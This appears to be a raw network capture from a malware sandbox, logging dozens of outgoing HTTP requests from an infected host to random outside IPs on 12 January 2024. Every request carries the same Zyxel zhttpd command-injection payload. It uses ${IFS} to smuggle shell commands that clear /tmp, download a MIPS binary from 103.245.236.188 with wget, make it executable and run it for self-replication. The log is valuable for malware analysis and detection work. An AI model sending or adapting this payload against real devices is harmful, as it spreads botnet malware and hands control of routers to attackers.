                                                Jan 12, 2024 18:16:25.502382994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5009192.168.2.2341282174.125.125.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502414942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5010192.168.2.2349002222.4.95.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502465963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5011192.168.2.2336296134.43.211.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502499104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5012192.168.2.234985699.89.39.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502526999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5013192.168.2.2336706196.209.27.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502558947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5014192.168.2.2348376192.61.82.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502635002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5015192.168.2.2334198126.216.89.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502667904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5016192.168.2.233377475.252.216.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502721071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5017192.168.2.234365646.214.104.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502742052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5018192.168.2.235804013.2.215.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502798080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5019192.168.2.2351544180.251.67.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502829075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5020192.168.2.234099078.64.157.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502861023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5021192.168.2.23329565.236.205.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502885103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5022192.168.2.23411188.116.112.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502923012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5023192.168.2.234414885.57.97.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502959967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5024192.168.2.2335866158.171.168.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502995014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5025192.168.2.2339922159.242.144.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503035069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5026192.168.2.2346176210.21.202.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503062963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5027192.168.2.233366857.112.185.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503108025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5028192.168.2.233761095.243.123.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503143072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5029192.168.2.2338006138.124.135.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503170013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5030192.168.2.2360572117.231.149.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503207922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5031192.168.2.235316086.243.62.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503249884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5032192.168.2.2335634157.137.82.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503292084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5033192.168.2.2356280204.60.30.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503331900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5034192.168.2.234421452.154.251.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503369093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5035192.168.2.2354672149.96.201.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503432989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5036192.168.2.23373162.93.166.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503468990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5037192.168.2.236005283.117.213.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503500938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5038192.168.2.233953862.169.28.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503530025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5039192.168.2.2351422147.197.142.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503556013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5040192.168.2.235518293.43.203.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503621101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5041192.168.2.234139053.82.13.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503670931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5042192.168.2.2353280142.92.203.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503701925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5043192.168.2.233980061.217.86.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503752947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5044192.168.2.2350716174.115.133.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503788948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5045192.168.2.234316619.219.59.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503839016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5046192.168.2.234552827.12.44.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503887892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5047192.168.2.234042237.3.169.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503926039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5048192.168.2.233606496.58.8.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503968000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5049192.168.2.2350088133.85.186.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.503998041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5050192.168.2.2352678178.204.152.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504041910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5051192.168.2.2360220107.58.130.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504096031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5052192.168.2.2339286212.8.103.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504117966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5053192.168.2.233359449.73.96.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504165888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5054192.168.2.2340982159.196.233.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504211903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5055192.168.2.2343418151.141.238.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504235029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5056192.168.2.236044431.171.156.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504281998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5057192.168.2.2351630110.150.109.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504303932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5058192.168.2.234885286.82.193.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504349947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5059192.168.2.234700252.227.31.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504379988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5060192.168.2.2340118168.245.135.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504420996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5061192.168.2.233331431.233.174.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504463911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5062192.168.2.2352426108.45.214.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504523039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5063192.168.2.2338194109.73.64.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504574060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5064192.168.2.2335132151.146.95.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504606962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5065192.168.2.234773666.97.136.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504648924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5066192.168.2.23424229.201.227.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504677057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5067192.168.2.235980880.42.6.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504712105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5068192.168.2.2336690191.147.252.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504729986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5069192.168.2.234047247.238.139.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504760981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5070192.168.2.233944286.178.87.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.504812002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5071192.168.2.234920876.19.157.185443
                                                TimestampBytes transferredDirectionData
